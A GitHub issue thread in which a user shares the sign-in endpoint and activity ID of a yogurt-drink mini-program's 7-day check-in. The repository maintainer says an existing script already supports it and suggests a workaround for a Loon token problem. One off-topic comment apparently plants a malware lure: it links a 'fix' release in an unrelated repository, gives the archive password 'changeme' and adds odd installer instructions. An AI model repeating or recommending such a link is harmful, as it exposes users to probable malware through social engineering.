### ISSUE TITLE
酸奶罐罐签到7天兑换饮品券

### ISSUE THREAD

**Issue by th2006464** [Sliverkiss/QuantumultX#11]
酸奶罐罐小程序
link:https://webapi.qmai.cn/web/cmk-center/sign/takePartInSign
activityId :"960937677934194688"

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Sliverkiss** [comment]
> 酸奶罐罐小程序
> 
> link:https://webapi.qmai.cn/web/cmk-center/sign/takePartInSign
> 
> activityId :"960937677934194688"

感谢投稿，奶茶多合一脚本已经兼容该签到，可以直接使用。

**Comment by th2006464** [comment]
Loon进入小程序提示获取d到token，然后页面持续提示loading无法进入

**Comment by Sliverkiss** [comment]
> Loon进入小程序提示获取d到token，然后页面持续提示loading无法进入

surge和qx都正常，也许你应该和loon作者反馈。折中方案为拿到ck后关闭插件再进入小程序。

**Comment by th2006464** [comment]
谢谢！ 折中方案，问题已解决！
